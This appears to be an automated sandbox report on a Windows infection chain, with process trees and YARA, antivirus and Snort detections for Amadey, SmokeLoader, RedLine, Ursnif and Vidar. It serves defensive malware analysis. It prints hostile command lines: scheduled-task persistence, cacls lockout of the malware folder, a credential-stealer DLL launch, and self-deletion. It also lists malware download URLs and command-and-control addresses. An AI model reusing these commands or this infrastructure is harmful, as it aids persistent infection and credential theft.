Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: CF35.exePID: 4392, Parent PID: 3452

General

Target ID:	17
Start time:	16:58:29
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\CF35.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\CF35.exe
Imagebase:	0x7ff74f320000
File size:	3188224 bytes
MD5 hash:	44A7E13ECC55CE9797C5121B230D9927
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 23%, ReversingLabs
Reputation:	low

Analysis Process: schtasks.exePID: 2384, Parent PID: 4852

General

Target ID:	18
Start time:	16:58:32
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Imagebase:	0xea0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 2364, Parent PID: 2384

General

Target ID:	19
Start time:	16:58:33
Start date:	19/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 6140, Parent PID: 4852

General

Target ID:	20
Start time:	16:58:33
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 2820, Parent PID: 6140

General

Target ID:	21
Start time:	16:58:33
Start date:	19/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 68, Parent PID: 6140

General

Target ID:	22
Start time:	16:58:33
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 2016, Parent PID: 6140

General

Target ID:	23
Start time:	16:58:33
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "rovwer.exe" /P "user:N"
Imagebase:	0xb80000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: E35A.exePID: 4252, Parent PID: 3452

General

Target ID:	24
Start time:	16:58:34
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\E35A.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E35A.exe
Imagebase:	0x400000
File size:	342528 bytes
MD5 hash:	19A79DADDFAAC09499E79ADE27E756F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs

Analysis Process: cacls.exePID: 5168, Parent PID: 6140

General

Target ID:	25
Start time:	16:58:34
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "rovwer.exe" /P "user:R" /E
Imagebase:	0xb80000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: rovwer.exePID: 5372, Parent PID: 1080

General

Target ID:	26
Start time:	16:58:35
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Imagebase:	0x400000
File size:	385536 bytes
MD5 hash:	0E455D9C65E7D53A67C227DCD8D70FB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Analysis Process: cmd.exePID: 5444, Parent PID: 6140

General

Target ID:	27
Start time:	16:58:36
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: EB2B.exePID: 5512, Parent PID: 3452

General

Target ID:	28
Start time:	16:58:36
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\EB2B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\EB2B.exe
Imagebase:	0xc40000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 27%, ReversingLabs

Analysis Process: cacls.exePID: 5484, Parent PID: 6140

General

Target ID:	29
Start time:	16:58:37
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\99e342142d" /P "user:N"
Imagebase:	0xb80000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 5608, Parent PID: 6140

General

Target ID:	30
Start time:	16:58:38
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\99e342142d" /P "user:R" /E
Imagebase:	0xb80000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: EB2B.exePID: 5628, Parent PID: 5512

General

Target ID:	31
Start time:	16:58:39
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\EB2B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\EB2B.exe
Imagebase:	0xc40000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: F771.exePID: 5640, Parent PID: 3452

General

Target ID:	32
Start time:	16:58:39
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\F771.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\F771.exe
Imagebase:	0x400000
File size:	459264 bytes
MD5 hash:	DF920AEBFABB8C4CCCEB4DCEAD922ABD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: explorer.exePID: 5644, Parent PID: 3452

General

Target ID:	33
Start time:	16:58:40
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf80000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: explorer.exePID: 5656, Parent PID: 3452

General

Target ID:	34
Start time:	16:58:42
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 5816, Parent PID: 3452

General

Target ID:	35
Start time:	16:58:43
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf80000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: EB2B.exePID: 5828, Parent PID: 5628

General

Target ID:	36
Start time:	16:58:43
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\EB2B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\EB2B.exe
Imagebase:	0xc40000
File size:	341006 bytes
MD5 hash:	F46063253FF38E6B2452BF4410C5FEC0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.522046166.000000000127B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: explorer.exePID: 5876, Parent PID: 3452

General

Target ID:	37
Start time:	16:58:44
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: explorer.exePID: 5068, Parent PID: 3452

General

Target ID:	38
Start time:	16:58:46
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf80000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: explorer.exePID: 3932, Parent PID: 3452

General

Target ID:	39
Start time:	16:58:48
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf80000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: rundll32.exePID: 4964, Parent PID: 4852

General

Target ID:	40
Start time:	16:58:50
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Imagebase:	0xe20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi

Analysis Process: explorer.exePID: 408, Parent PID: 3452

General

Target ID:	41
Start time:	16:58:50
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf80000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: explorer.exePID: 4972, Parent PID: 3452

General

Target ID:	42
Start time:	16:58:51
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 5248, Parent PID: 3452

General

Target ID:	43
Start time:	16:58:52
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf80000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Analysis Process: cmd.exePID: 1852, Parent PID: 5828

General

Target ID:	44
Start time:	16:59:09
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5944, Parent PID: 1852

General

Target ID:	45
Start time:	16:59:10
Start date:	19/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: timeout.exePID: 5980, Parent PID: 1852

General

Target ID:	46
Start time:	16:59:11
Start date:	19/11/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0x20000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RegSvcs.exePID: 5128, Parent PID: 4392

General

Target ID:	47
Start time:	16:59:14
Start date:	19/11/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Imagebase:	0x2adbfe50000
File size:	44640 bytes
MD5 hash:	59FCE79E9D81AB9E2ED4C3561205F5DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Source: http://116.202.5.101/446391140202.zip	Avira URL Cloud: Label: malware
Source: http://193.56.146.168/mia/solt.exe	Avira URL Cloud: Label: malware
Source: http://116.202.5.101:80	Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Metadefender: Detection: 71%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Metadefender: Detection: 71%	Perma Link
Source: C:\Users\user\AppData\Roaming\cttgcew	ReversingLabs: Detection: 26%

Source: 24.3.E35A.exe.880000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.E35A.exe.870e67.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 24.2.E35A.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49727 -> 77.232.37.228:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49730 -> 77.232.37.228:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49736 -> 77.232.37.228:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 193.56.146.174:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 193.56.146.174:80

Source: Malware configuration extractor	URLs: 185.106.92.111:2510
Source: Malware configuration extractor	URLs: http://o3l3roozuidudu.com/
Source: Malware configuration extractor	URLs: http://o3npxslymcyfi2.com/
Source: Malware configuration extractor	URLs: http://o3b1wk8sfk74tf.com/
Source: Malware configuration extractor	URLs: https://t.me/deadftx
Source: Malware configuration extractor	URLs: https://www.tiktok.com/@user6068972597711

